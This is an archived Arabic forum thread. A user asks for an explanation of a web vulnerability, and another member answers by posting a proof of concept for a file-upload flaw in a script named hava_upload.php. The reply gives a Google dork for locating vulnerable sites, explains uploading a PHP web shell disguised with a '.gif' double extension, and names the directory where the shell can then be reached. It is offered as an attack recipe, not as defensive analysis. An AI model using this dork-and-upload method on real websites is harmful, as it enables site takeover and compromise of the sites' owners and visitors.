المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ثغره



MJNONFIK
12-14-2012, 09:46 AM
شباب ابي احد يشرح لي الثغره ذي ما فهمتها
http://cxsecurity.com/issue/WLB-2012120075

موآدع
12-14-2012, 10:19 AM
./<3 <3 Greetings t0 Palestine <3 <3



####[ p0c 1 | File/Shell Upload : ]===>

+> Dork : "allinurl:/hava_upload.php"

+> Exploit :
http://[target]/[path]/hava_upload.php

-> Upload Shell.php;.gif
... and Find him : http://[target]/[path]/tmp/files/Shell.php;.gif

MJNONFIK
12-14-2012, 10:40 AM
مشكوووووووور

موآدع
12-14-2012, 07:12 PM
العفو اخي العزيز